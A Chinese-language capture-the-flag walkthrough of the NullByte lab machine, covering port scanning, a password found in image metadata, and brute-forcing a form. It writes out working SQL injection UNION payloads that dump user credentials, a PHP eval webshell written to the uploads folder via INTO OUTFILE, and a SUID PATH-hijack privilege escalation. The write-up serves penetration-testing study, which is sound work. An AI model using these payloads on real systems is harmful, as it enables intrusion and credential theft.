靶机通关1--nullbytes

靶机通关1–nullbytes

1.扫描靶机是否存活,并确定靶机ip

sudo nmap -sn 192.168.85.0/24

2.扫描端口信息

sudo nmap -min-rate 10000 -p- -oA nampscan/ports 靶机ip

参数详细意思

-min-rate [数字] 以最小速率n扫描

-p 指定端口 -p- 表示扫描 1-65535端口

-oA 将扫描结果以三种结果输出到指定位置

可以看到 80,111,777,57394端口打开

接着扫描它们的详细信息

sudo nmap -sT -sV -sC -O -p80,111,777,57394 靶机ip

-sT:以tcp方式扫描

-sV:探测服务的版本

-sC:默认脚本扫描

-O:探测操作系统版本

可以看到

80端口运行http服务使用的apache,777端口是ssh服务(默认是22端口),111端口出现error报错信息显示nmap的rpcinfo脚本执行失败,57394端口与rpc服务相关

111端口没扫出来,再试一遍

这下扫出来了111端口的详细信息,也是rpc相关.

之前使用了tcp方式扫描,rpc服务往往也与udp相关,所以也用udp扫一遍

sudo nmap -sU -p80,111,777,57394 -oA nmapscan/udp 靶机ip

-sU:以udp方式扫描

111端口的udp开放

接着扫描端口是否具有漏洞

sudo nmap -script=vuln -80,111,777,57394 -oA nmapscan/vuln 192.168.85.136

-script:启动并执行相应脚本

auth: 负责处理鉴权证书（绕开鉴权）的脚本
broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式，针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力
discovery: 对网络进行更多的信息，如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源，例如进行whois解析
fuzzer: 模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞 intrusive: 入侵性的脚本，此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反，属于安全性脚本
version: 负责增强服务与版本扫描（Version Detection）功能的脚本
vuln: 负责检查目标机是否有常见的漏洞（Vulnerability），如是否有MS08_067

可以看到80端口找到了一个dos漏洞,无法利用,其他端口没找到漏洞,还在80端口下找到了/phpmyadmin,/uploads目录

2.web渗透

上面找到了一些目录,我们先访问一下靶机

查看一下源码

发现一个main.gif,下载下来看看

既然是图片,那看看有没有隐写之类的

看看格式对不对

没问题

再使用exiftool看看有没有隐藏信息

comment这个字符串似乎有点可疑

先试一下base64解码,解出乱码,再试试hash

hash-identifier kzMb5nVYJw

不是hash值

那么就当是明文.

整理一下手中的情报,我们扫描端口时得到各个端口的服务,扫描漏洞时找到了80端口下/phpmyadmin,/uploads目录,同时还通过浏览器访问靶机找到了一串 kzMb5nVYJw

接着访问一下那些目录

那么思考这串字符能在哪里使用,或者说可以在哪里输入

第一,phpmyadmin的输入框

第二,ssh登录

第三,url


发现是url

看眼源码,告诉我们密码并不复杂,尝试暴力破解

成功破解

输入跳转到

尝试输入一下

发现查询数据的功能,试试能不能sql注入

输入"回显报错,很可能可以注入

方法一

" union select 1,2,3; #

" union select 1,user(),table_name from information_schema.tables where table_schema=database(); #

发现users表

" union select 1,user(),column_name from information_schema.columns where table_schema=database() and table_name='users' ; #

查出字段名

" union select 1,2,concat(user,"=",pass) from users; #

得到了用户以及一段字符串

base64解码

c6d6bd7ebf806f43c76acc3681703b81

是不是hash值

是md5

ssh成功登录

方法二

写入一句话密码

" union select "<?php @eval($_POST['pass']);?>",2,3 into outfile "/var/www/html/uploads/shell1.php"; #

成功写入

蚁剑连接一下试试

成功

那么接下来寻找重要的文件,想到sql注入那个界面存在数据交互,可能有重要文件

找到420search文件

找到数据库root用户与密码

在phpmyadmin中登录

进入数据库拿到用户与密码

方法三

反弹shll一直没成功,暂时搁置

方法四

sqlmap太简单了,不用写笔记了就

3.SUID提权

SUID:Set User ID— 特殊权限位，允许用户以文件所有者的权限执行程序

登录进入ramses用户后,进行信息搜集

得知了用户的权限和能够操作(权限位为s,以文件所有者的权限执行程序)的文件

注意到有backup文件,往往该文件下存有备份文件可能很有价值

看到prowatch权限位s

我这是第二次实验,所以已经创建了软连接,接下来把当前目录设为环境变量,再执行prowatch

原理:我们创建了一个名为"ps"的软链接指向/bin/sh,并将当前目录设置在环境变量的最前面,这样我们在执行procwatch程序时,它会去调用ps,而当前目录最优先,调用了当前目录里的ps,也就是调用了/bin/sh,同时procwatch是以root权限调用的,所以我们也使用root权限打开了/bin/sh